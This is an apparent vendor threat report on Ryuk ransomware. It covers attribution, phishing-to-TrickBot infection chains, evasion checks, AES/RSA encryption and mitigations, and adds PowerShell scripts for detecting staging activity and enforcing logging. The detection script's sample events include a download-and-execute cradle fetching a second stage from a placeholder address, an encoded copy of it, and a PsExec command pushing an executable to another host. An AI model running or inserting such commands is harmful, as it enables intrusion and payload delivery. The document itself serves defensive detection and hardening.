Ryuk Ransomware Increased Activity Targets Large Organizations Using Windows OS

Avertium Threat Report

This report is an overview of the Ryuk ransomware and contains actionable intelligence for understanding and protecting against the malware threat.

Overview of Ryuk Ransomware

Discovered in 2018, this ransomware continues to attract publicity because of its impact on large organizations, and malware researchers have noted increased Ryuk activity in recent months. Most recently, Ryuk was used in a successful attack on Universal Health Services, one of the largest healthcare providers in the United States.

Ryuk has been attributed to more than one threat actor. Early reporting pointed to North Korea, largely because of Ryuk's code overlap with the Hermes ransomware, while subsequent analysis traced the operation to Russia. The Russia-based Wizard Spider group is now generally considered to be behind the Ryuk attacks; the same group is credited with operating the TrickBot malware.

Ryuk Ransomware Tactics, Techniques, and Procedures

Malware researchers believe Ryuk is a derivative of the older Hermes ransomware, since much of the Hermes code reappears in Ryuk. Ryuk has continued to develop beyond Hermes since its discovery. At this time only Windows devices appear to be targeted.

Like much other malware, a Ryuk infection usually begins with a phishing campaign. Phishing may deliver the ransomware directly, but more often it first installs Emotet or TrickBot, and the operators decide later whether to push the Ryuk executable payload out to the compromised network and encrypt it. PowerShell is commonly used to download and stage the payload, with post-exploitation frameworks such as PowerShell Empire and remote-execution tools such as PsExec used to move laterally and run it on other hosts. Avertium partner Sophos offers this graphic to depict an example chain of infection.

Ryuk ransomware chain of infection
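The staging behaviour described above (PowerShell download cradles, hidden windows, encoded commands, PsExec pushes to other hosts) is what script block logging captures, and it can be scored from the ScriptBlockText of Event ID 4104 records. The following hunt is an added example, not code from the Avertium report or from Sophos; every sample event, address and file name in it is constructed, and the rule weights and alert threshold are assumptions to tune against your own baseline.

```powershell
# Added example (not from the Avertium report or Sophos): score PowerShell
# script-block text for the staging behaviour Ryuk operators rely on.
# Sample events, addresses and file names are constructed; rule weights and
# the alert threshold are assumptions.

$Rules = @(
    @{ Name = 'download-cradle'; Weight = 2
       Pattern = 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer' }
    @{ Name = 'in-memory-exec';  Weight = 1; Pattern = '\bIEX\b|Invoke-Expression' }
    @{ Name = 'hidden-window';   Weight = 1; Pattern = '-w(indowstyle)?\s+hidden' }
    @{ Name = 'bypass-policy';   Weight = 1; Pattern = '-(ep|ExecutionPolicy)\s+bypass' }
    @{ Name = 'encoded-command'; Weight = 2; Pattern = '-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name = 'lateral-psexec';  Weight = 3; Pattern = 'psexec|\\\\[\w.-]+\\(admin|c)\$' }
)
$AlertThreshold = 3   # assumption: one strong indicator, or two weaker ones, raises an alert

function Get-EncodedCommandPayload {
    param([string]$Text)
    # -EncodedCommand (and the -e/-ec/-enc shorthands) carries base64 of a UTF-16LE script
    if ($Text -match '-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
        catch { return $null }
    }
    return $null
}

function Test-ScriptBlock {
    param([string]$Text)
    $decoded = Get-EncodedCommandPayload -Text $Text
    # Scan the decoded payload as well, so encoding alone does not hide a cradle
    $scan = if ($decoded) { "$Text`n$decoded" } else { $Text }
    $hits = @(); $score = 0
    foreach ($rule in $Rules) {
        if ($scan -match $rule.Pattern) { $hits += $rule.Name; $score += $rule.Weight }
    }
    [pscustomobject]@{
        Score      = $score
        Alert      = ($score -ge $AlertThreshold)
        Indicators = $hits
        Decoded    = $decoded
        Text       = $Text
    }
}

# Constructed sample events in the shape of Event ID 4104 ScriptBlockText
$stage2  = 'IEX (New-Object Net.WebClient).DownloadString(''http://203.0.113.10/stage.ps1'')'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($stage2))
$SampleEvents = @(
    'Get-Service | Where-Object Status -eq Running | Sort-Object Name'   # routine admin work
    "powershell.exe -nop -w hidden -c `"$stage2`""                       # loader fetching a second stage
    "powershell.exe -nop -ep bypass -enc $encoded"                       # same cradle, hidden by encoding
    'psexec.exe \\203.0.113.20 -s -d cmd /c C:\Windows\Temp\rnd.exe'     # pushing a payload to another host
)

foreach ($event in $SampleEvents) {
    $r = Test-ScriptBlock -Text $event
    '{0} score={1} [{2}]' -f ($(if ($r.Alert) { 'ALERT' } else { 'ok   ' }), $r.Score, ($r.Indicators -join ', '))
}
```

Run as written, the benign service listing scores 0, the plain cradle scores 4 (download, in-memory execution, hidden window), the encoded variant scores 6 because the decoded payload is scanned too, and the PsExec line alerts on its own. On a live host, feed it real records with `Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } | ForEach-Object { Test-ScriptBlock -Text $_.Properties[2].Value }`; a single `DownloadString` in an administrator's deployment script deliberately stays below the threshold, so tune the weights to what your own administrators actually run.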

Ryuk is distributed with a dropper that writes the actual executable payload to disk. The dropper is rarely recovered, because it is deleted from the system once the payload runs; it generates a random file name for the payload at installation.

Before encrypting, the malware checks whether it is running under VirtualBox and whether the system language is Russian, Ukrainian, or Belarusian, and will not execute on such systems. It then enumerates every drive mounted on the host and every host it can reach over the network, encrypting the mounted drives and any remote shares it can access. Files are encrypted with AES-256, and the AES keys are in turn protected with RSA-2048. Once encryption completes, a ransom note is placed on the system demanding payment in Bitcoin for decryption of the files.

The following ransom note sample is provided by CrowdStrike:

Ryuk ransomware ransom note sample

What Ryuk Infection Means to You

  • Infection leads to data encryption or loss.
  • Sensitive business data may be leaked to the public.
  • Wizard Spider has demanded ransoms of up to 99 BTC (approximately $1,047,429 at the time).
  • The true cost of a ransomware infection can far exceed the ransom demand because of factors such as system downtime and recovery effort.

What You Can Do About Ryuk

  • Provide users with training on best practices to avoid phishing, as well as awareness of recent trends in phishing campaigns.
  • Regularly update Windows hosts with recently released patches.
  • Update older versions of Windows to Windows 10 for increased security features.
  • Implement a regular backup schedule for systems, especially those with critical data.
  • Use Endpoint Protection with anti-ransomware features such as Sophos Intercept X.
  • Implement best practices and security features for PowerShell on your network.
    • Run PowerShell 5.0 or greater on systems that require PowerShell, since script block logging and other security features are not available in older engines.
    • Apply the principle of least privilege: allow PowerShell, and related tools like PsExec, to run only for the users and hosts that require them.
    • Enable script block logging and transcription to capture PowerShell activity.
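The PowerShell items above applied to a single host, as an added example rather than code from the Avertium report: it writes the standard Group Policy registry values for script block logging and transcription, removes the PowerShell 2.0 engine (which has none of this logging and can otherwise be selected with `powershell.exe -Version 2`), and reads the settings back so the result can feed a compliance check. It assumes an elevated session and uses `C:\PSTranscripts` as a stand-in transcript location.

```powershell
# Added example, not code from the Avertium report. Enforces the PowerShell
# recommendations above on one host. Run from an elevated session. The
# registry paths are the standard policy paths for these settings; the
# transcript directory is an assumed location.

$PolicyBase     = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
$ScriptBlockKey = "$PolicyBase\ScriptBlockLogging"
$TranscriptKey  = "$PolicyBase\Transcription"
$TranscriptDir  = 'C:\PSTranscripts'   # assumed; point this at a write-only central share in production

function Set-PolicyValue {
    param([string]$Key, [string]$Name, $Value, [string]$Type = 'DWord')
    if (-not (Test-Path $Key)) { New-Item -Path $Key -Force | Out-Null }
    New-ItemProperty -Path $Key -Name $Name -PropertyType $Type -Value $Value -Force | Out-Null
}

function Enable-PowerShellAuditLogging {
    # Script block logging: Event ID 4104 in Microsoft-Windows-PowerShell/Operational,
    # recording script content as it executes, after any de-obfuscation
    Set-PolicyValue $ScriptBlockKey 'EnableScriptBlockLogging' 1

    # Transcription: a per-session transcript with an invocation header (user, host, time)
    Set-PolicyValue $TranscriptKey 'EnableTranscripting'    1
    Set-PolicyValue $TranscriptKey 'EnableInvocationHeader' 1
    Set-PolicyValue $TranscriptKey 'OutputDirectory' $TranscriptDir -Type 'String'
    if (-not (Test-Path $TranscriptDir)) { New-Item -ItemType Directory -Path $TranscriptDir | Out-Null }
}

function Remove-PowerShellV2Engine {
    # Without this, powershell.exe -Version 2 falls back to an engine with no script block logging
    $v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    if ($v2 -and $v2.State -eq 'Enabled') {
        Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -NoRestart | Out-Null
    }
}

function Test-PowerShellBaseline {
    # Read back what is actually in effect rather than trusting the writes above
    $sbl = (Get-ItemProperty -Path $ScriptBlockKey -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    $tr  = Get-ItemProperty -Path $TranscriptKey -ErrorAction SilentlyContinue
    $v2  = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    [pscustomobject]@{
        EngineVersion      = $PSVersionTable.PSVersion.ToString()
        EngineIsV5OrLater  = ($PSVersionTable.PSVersion.Major -ge 5)
        V2EngineRemoved    = (-not $v2) -or ($v2.State -ne 'Enabled')
        ScriptBlockLogging = ($sbl -eq 1)
        Transcription      = ($tr.EnableTranscripting -eq 1) -and ($tr.OutputDirectory -eq $TranscriptDir)
    }
}

Enable-PowerShellAuditLogging
Remove-PowerShellV2Engine
Test-PowerShellBaseline | Format-List

# The policy applies to new sessions; confirm 4104 records are arriving from one:
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 5
```

In production, push the same registry values through Group Policy rather than host by host, and forward the Microsoft-Windows-PowerShell/Operational log to your SIEM, since an attacker with local administrator rights can clear a local event log. Keep the transcript directory on a share that users can write to but not read or delete from, so transcripts survive the attacker who generated them.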

Indicators of Compromise (IOCs)

MITRE Mapping(s)

Sources and Other Helpful Information

Contact us for more information about Avertium’s managed security service capabilities. 


Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report will outline a “top-of-mind” threat and how it ought to be addressed accordingly.

This informed analysis is based on the latest data available.
